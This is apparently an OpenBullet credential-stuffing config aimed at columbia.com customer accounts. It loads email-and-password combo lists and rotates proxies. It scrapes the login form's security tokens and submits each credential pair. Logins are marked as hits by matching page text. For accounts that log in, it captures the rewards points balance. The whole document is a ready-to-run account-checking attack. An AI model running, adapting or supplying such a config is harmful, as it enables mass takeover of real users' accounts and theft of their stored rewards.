[SETTINGS]
{
  "Name": "columbia.com",
  "SuggestedBots": 100,
  "LastModified": "2018-06-16T15:02:24.2144995+00:00",
  "AdditionalInfo": "",
  "Author": "SubAtomic",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#REQUEST_PAGE_(GET) REQUEST GET "https://www.columbia.com/account" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#PARSE_SECUREKEY PARSE "<SOURCE>" CSS "[name=dwfrm_login_securekey]" "value" 0 -> VAR "SECUREKEY" "" "" 
#PARSE_DWCONT PARSE "<SOURCE>" LR "account?dwcont=" "\"" Recursive=FALSE -> VAR "DWCONT" "" "" 
#REQUEST_LOGIN_(POST) REQUEST POST "https://www.columbia.com/account?dwcont=<DWCONT>" AutoRedirect=TRUE 
  CONTENT "dwfrm_login_username_d0mqykafpfur=<USER>&dwfrm_login_password=<PASS>&dwfrm_login_securekey=<SECUREKEY>&dwfrm_login_login=Login" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "referer: https://www.columbia.com/account" 
  HEADER "origin: https://www.columbia.com" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=FALSE 
  KEYCHAIN Failure OR 
    KEY "Sorry, this does not match our records. Check your spelling and try again" 
    KEY "If you are a registered user, please enter your email and password." 
  KEYCHAIN Success OR 
    KEY "Sign Out" 
#REQUEST_REWARDS_(GET) REQUEST GET "https://www.columbia.com/rewards-activity" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#PARSE_POINTS PARSE "<SOURCE>" LR "						<div class=\"value\">" "</div>" Recursive=FALSE -> CAP "POINTS" "" "" 
